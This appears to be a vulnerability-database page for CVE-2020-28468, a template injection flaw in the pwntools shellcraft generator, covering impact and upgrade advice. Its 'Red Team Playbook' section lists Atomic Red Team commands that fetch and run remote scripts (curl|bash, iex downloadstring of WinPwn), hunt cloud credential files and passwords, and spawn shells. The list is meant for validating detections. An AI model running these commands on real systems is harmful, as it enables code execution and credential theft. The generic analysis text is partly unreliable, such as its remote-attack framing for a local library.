CVE-2020-28468
Overview
The vulnerability is a Server-Side Template Injection (SSTI) affecting the shellcraft generator component in pwntools versions prior to 4.3.1. The root cause lies in unsafe template rendering that allows user-controllable input to be processed as executable code within the template engine. This improper input handling in the shellcraft generator enables injection of arbitrary template expressions.
Vulnerability Description
This affects the package pwntools before 4.3.1. The shellcraft generator for affected versions of this module are vulnerable to Server-Side Template Injection (SSTI), which can lead to remote code execution.
Impact
An unauthenticated remote attacker can exploit this SSTI vulnerability to execute arbitrary code on the server hosting the vulnerable pwntools shellcraft generator. Since the attack vector requires no privileges and no user interaction, the attacker can fully compromise the affected system remotely. This can lead to unauthorized data access, system takeover, or disruption of services. The CVSS vector (AV:N/AC:H/PR:N/UI:N) indicates network attack complexity is high but no authentication or user interaction is required.
Solution
Users of pwntools should upgrade to version 4.3.1 or later, where the shellcraft generator's template injection flaw is fixed. The fix is documented in the official GitHub repository pull request #1732. Detailed patch instructions and version updates are available at https://github.com/Gallopsled/pwntools/issues/1427 and https://github.com/Gallopsled/pwntools/pull/1732. No alternative workarounds are recommended beyond applying the updated version.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the pwntools package stems from a flaw in its shellcraft generator, which is susceptible to Server-Side Template Injection (SSTI). This type of vulnerability occurs when user input is improperly sanitized, allowing an attacker to inject malicious templates into the server-side rendering process. In the case of pwntools, the shellcraft generator is designed to facilitate the creation of shellcode, which is often used in penetration testing and exploitation scenarios. When an attacker successfully exploits this vulnerability, they can manipulate the template rendering engine to execute arbitrary code on the server, leading to remote code execution. The severity of this flaw is underscored by its high CVSS score of 9.8, indicating a critical risk to systems utilizing affected versions of the package.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving the manipulation of input parameters that are processed by the shellcraft generator. An attacker could craft a malicious payload that, when processed by the vulnerable application, results in the execution of arbitrary commands on the server. For instance, if an application allows users to submit shell commands or scripts through a web interface, an attacker could inject a crafted template that executes system commands, potentially gaining unauthorized access to sensitive data or control over the server. This exploitation could be executed remotely, making it particularly dangerous for applications that are publicly accessible.
The real-world impact of this vulnerability is significant, especially for organizations that rely on pwntools for security testing or development purposes. Successful exploitation could lead to unauthorized access to critical systems, data breaches, and the potential for further lateral movement within an organization's network. The business risks associated with such an incident include reputational damage, financial losses due to remediation efforts, and potential legal liabilities stemming from data protection regulations. Organizations that utilize pwntools must recognize the implications of this vulnerability and take proactive measures to safeguard their environments.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is crucial to upgrade to the latest version of pwntools, which addresses the vulnerability and eliminates the associated risks. Regularly updating software components is a fundamental practice in maintaining a secure environment. Additionally, organizations should conduct thorough security assessments and code reviews of applications that utilize pwntools to identify any instances of improper input handling or template rendering. Employing web application firewalls (WAFs) can also provide an additional layer of protection by filtering out malicious requests before they reach the application.
In conclusion, the vulnerability within the pwntools package represents a critical threat that can lead to severe consequences if left unaddressed. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such threats. Implementing robust detection and mitigation strategies is essential to safeguard against exploitation and ensure the integrity of their systems. As the cybersecurity landscape continues to evolve, staying informed and proactive in addressing vulnerabilities is paramount for maintaining a secure operational environment.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Pwntools Project | Pwntools | All |
cpe:2.3:a:pwntools_project:pwntools:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-28468 |
| snyk.io |
GitHub CVE
x_refsource_MISC
|
https://snyk.io/vuln/SNYK-PYTHON-PWNTOOLS-1047345 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Gallopsled/pwntools/issues/1427 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Gallopsled/pwntools/pull/1732 |